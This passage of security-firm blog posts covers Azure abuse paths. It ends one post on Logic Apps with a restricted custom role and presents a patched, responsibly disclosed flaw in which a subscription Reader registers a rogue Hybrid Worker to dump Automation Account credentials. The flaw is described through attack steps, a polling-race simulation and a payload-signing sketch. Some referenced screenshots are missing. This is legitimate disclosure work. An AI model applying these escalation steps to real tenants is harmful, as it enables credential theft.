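  "Name": "Contributor Minus API Connections",
  "Description": "Contributor rights without the ability to use or manage API Connections.",
  "Actions": [ "*" ],
  "NotActions": [
    "Microsoft.Web/connections/*",
    "Microsoft.Authorization/*/Delete",
    "Microsoft.Authorization/*/Write",
    "Microsoft.Authorization/elevateAccess/Action"
  ],
  "AssignableScopes": [ "/subscriptions/00000000-0000-0000-0000-000000000000" ]
}
```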

Conclusion

While the attack surface offered by Logic Apps is specific to each environment, hopefully you find this general guidance useful while evaluating your Logic Apps. To provide a brief recap:

  • Readers can read out any sensitive inputs (JWTs, OAuth details) or outputs (Key Vault secrets, results from HTTP requests) from current/previous versions and previous runs
  • Defenders can partially prevent this by using secure inputs/outputs in their Logic App definitions
  • Contributors can create a new Logic App to perform any actions associated with a given API Connection
  • Defenders must be aware of who has Contributor rights to sensitive API Connections

Work with NetSPI on your next Azure cloud penetration test or application penetration testing. Contact us: www.netspi.com/contact-us.

[Post: "Illogical Apps – Exploring and Exploiting Azure Logic Apps," published August 24, 2021]

Abusing Azure Hybrid Workers for Privilege Escalation – Part 2: An Azure PrivSec Story

April 14, 2022

The NetSPI team recently discovered a set of issues that allows any Azure user with the Subscription Reader role to dump saved credentials and certificates from Automation Accounts. In cases where Run As accounts were used, this allowed for a Reader to Contributor privilege escalation path.

This is part two of a two-part blog series. In part one, we walked through a privilege escalation scenario by abusing Azure hybrid workers. In this blog, we’ll dig a little deeper and explain how we utilized an undocumented internal API to poll information about the Automation Account (Runbooks, Credentials, Jobs).

Note: The scope of this bug is limited to a subscription. A subscription Reader account is necessary to exploit this bug, and it is not a cross-tenant issue.

Background: Azure Hybrid Worker Groups

The genesis of this research stemmed from studying any potential abuse mechanisms from how Azure Automation handled authenticating Hybrid Worker nodes.

Azure Automation’s core feature is Runbooks: pieces of code that run on Azure’s infrastructure or on customer-owned Azure Virtual Machines (VMs). These are often used to run scheduled tasks or manage Azure resources. To do so, a runbook must authenticate, which can happen through several methods.

Users can store credentials in Automation Accounts (AA) and access them via Runbooks. Automation Accounts can also use Run As accounts to create a Service Principal that will be used for authentication via a certificate stored in the Automation Account.  

The third option is using Managed Identities, which is what Microsoft is pushing users towards. Managed Identities allow the user to obtain a token at runtime to authenticate and eliminate the issue of stored credentials. The Get-AzPasswords script from the MicroBurst project supports dumping all three kinds of authentication, so long as you have Contributor access.  

Normally, a Runbook is executed in a sandbox on Azure’s infrastructure. However, this comes with certain constraints, namely processing power and execution time. Any long running or resource intensive code may be ill-suited to run in this manner.  

To bridge this gap, Azure offers Hybrid Worker Groups (HWG). HWGs offer users the ability to run Runbooks on their own Azure Virtual Machines, so they can run on more powerful machines for longer.  

Normally, this is accomplished by deploying a Virtual Machine Extension to the desired Virtual Machine to register the Virtual Machine as a HWG node. Then, the user can execute Runbooks on those Hybrid Worker nodes.  

There are also two types of HWGs: User and System. System HWGs are used for Update Management and don’t have the necessary permissions for what we’re interested in, so we’ll be focusing on User HWGs.

The First Set of Issues: Compromising Credentials

We began our research with a registered Hybrid Worker node. When you execute a runbook on the host, the HybridWorkerService process spawns the Orchestrator.Sandbox process. The command line for the latter is as follows.

Next, we focused on MSISecret. At first glance, it appears that the Hybrid Worker node must be able to use this to request an MSI token externally. After reversing the binary, this turned out to be true. 

Every Automation Account has a “Job Runtime Data Service” endpoint, or JRDS, which Hybrid Workers use to poll for jobs and request credentials. You can see the JRDS URL supplied in the command line above. Below is what the full path to request a token looks like in the binary. 

And here you can see this in action.

You can only get that MSI secret after receiving a job from the JRDS endpoint, which can be achieved by polling the /sandboxes endpoint. HWGs hand out jobs in a first-come, first-served fashion, so whichever node polls the endpoint first gets the job. By default, nodes poll every 60 seconds, so if we poll constantly, we should almost always beat out the other nodes and receive a job with a secret. However, this only works if Runbook jobs are actively being run through the HWG.
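The race itself is simple: whichever node's next poll lands first claims the job. A toy simulation of that first-come, first-served behavior (node names and intervals are made up):

```python
# Toy model of the JRDS job race: each node is some number of seconds away
# from its next poll of the /sandboxes endpoint; the soonest poll wins.

def winning_node(seconds_until_next_poll):
    """Return the node whose next poll arrives first."""
    return min(seconds_until_next_poll, key=seconds_until_next_poll.get)

# Legitimate workers poll every 60 seconds, so on average they are ~30s out;
# an attacker polling continuously is always a fraction of a second away.
nodes = {"legit-worker-1": 37.0, "legit-worker-2": 12.5, "attacker": 0.4}
print(winning_node(nodes))  # attacker
```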

Since we’re able to request Managed Identity tokens, it stands to reason that we can request other forms of authentication. A quick grep through the decompiled binary makes this apparent, and a quick request to these endpoints will yield results.

The JSON Web Token (JWT) in these requests is for the System Assigned MI of the Virtual Machine, not a management token for Azure.

Requesting all certificates:

We were satisfied with these findings. We figured that this represented an escalation path from Virtual Machine Contributor to Subscription Contributor if Hybrid Worker nodes were in use and reported our findings to Microsoft.

Escalating Our Findings

After we had submitted our report, we found a recently published blog that detailed some of these same ideas, though their thesis was obtaining lateral movement after an administrator pushed a certificate to the Virtual Machine. The author also demonstrated that you could register a new Hybrid Worker node to an Automation Account using the Automation Account key and Log Analytics Workspace key. We wondered if we could abuse this route to escalate the severity of our previous findings.

To read Automation Account keys, a user only needs the Reader role. To exploit this, we hacked up some source code from Microsoft’s Desired State Configuration (DSC) repository.

The repository contained some scripts that are used to register a new Hybrid Worker node, so we bypassed some environment checks and created users/groups that are expected to exist. The registration process looks like this: 

  1. Generate a new self-signed certificate or use an existing one
  2. Create a payload with some details: HWG name, IP address, certificate thumbprint, etc.
  3. Sign the payload with the AA key
  4. Send a PUT request to the AA with all the above info 

This also does not require Hybrid Worker Groups to already be in use; we can supply an arbitrary group name and it will be created. After registering, we can use the certificate and key generated during this process to access the same endpoints that we identified earlier. You also don’t need a Log Analytics workspace key to register because not all AAs are linked to a workspace. 
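To give a feel for step 3 of the registration flow, here is a sketch of signing a registration payload with an Automation Account key. The HMAC-SHA256 construction matches the general approach in Microsoft's DSC registration scripts, but the payload fields and serialization here are illustrative rather than the actual wire format.

```python
# Sketch: sign a Hybrid Worker registration payload with the AA primary key.
# Field names and canonicalization are illustrative only.
import base64, hashlib, hmac, json

def sign_registration_payload(payload: dict, aa_primary_key: str) -> str:
    """HMAC-SHA256 the serialized payload with the base64-decoded AA key."""
    key = base64.b64decode(aa_primary_key)
    message = json.dumps(payload, sort_keys=True).encode()
    digest = hmac.new(key, message, hashlib.sha256).digest()
    return base64.b64encode(digest).decode()

payload = {
    "HybridGroupName": "attacker-hwg",  # arbitrary; the group is created if absent
    "IPAddress": "10.0.0.4",
    "Thumbprint": "AA11BB22CC33",       # thumbprint of our self-signed certificate
}
aa_key = base64.b64encode(b"fake-automation-account-key").decode()
signature = sign_registration_payload(payload, aa_key)
# `signature` would accompany the PUT request that registers the worker.
```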

From start to finish, this exploit works as follows: 

  1. Attacker with Reader access reads the victim Automation Account key
  2. Attacker uses this key to register their own Virtual Machine in their own tenant as a Hybrid Worker node
  3. Attacker can dump any credentials or certificates from the victim AA and use them to authenticate 

We reported this issue to MSRC in a separate report. Below is the timeline for this case: 

  • October 25, 2021: Initial report submitted 
  • December 13, 2021: Second report submitted with details of full privilege escalation 
  • December 31, 2021: $10k bounty awarded 
  • March 14, 2022: Patch is applied 

Microsoft’s Response to the Azure Automation Account Vulnerabilities

After reporting our findings, Microsoft identified the Azure Automation customers vulnerable to this exploit and notified them through the Azure portal. A fix has been rolled out to all customers.

Additionally, Microsoft has updated their documentation with mitigation steps for customers. They’ve updated the Reader role so that it no longer has the ListKeys permission on Automation Accounts and can no longer fetch Automation Account keys. They recommend that customers switch to custom roles if they need a Reader to fetch the Automation Account keys.

Microsoft has also provided the following guidance for deploying Hybrid Workers:

Microsoft recommends installing Hybrid workers using the Hybrid Runbook Worker Virtual Machine extension – without using the automation account keys – for registration of hybrid worker. Microsoft recommends this platform as it leverages a secure Azure AD based authentication mechanism and centralizes the control and management of identities and other resource credentials. Refer to the security best practices for Hybrid worker role.

Conclusion

This issue allowed any user who could read Automation Account keys to extract any credentials or certificates from the affected Automation Account. This issue was not particularly technical or difficult to exploit, and only abused the intended methods for registration and credential retrieval. 

This is a good reminder that even low privileged role assignments such as Reader can have unintended consequences in your cloud environment. 

Want to learn more about cloud penetration testing? Consider registering for NetSPI’s upcoming Dark Side Ops: Azure Cloud Pentesting training or explore our Azure cloud penetration testing service.

[Post: "Abusing Azure Hybrid Workers for Privilege Escalation – Part 2: An Azure PrivSec Story," published April 14, 2022]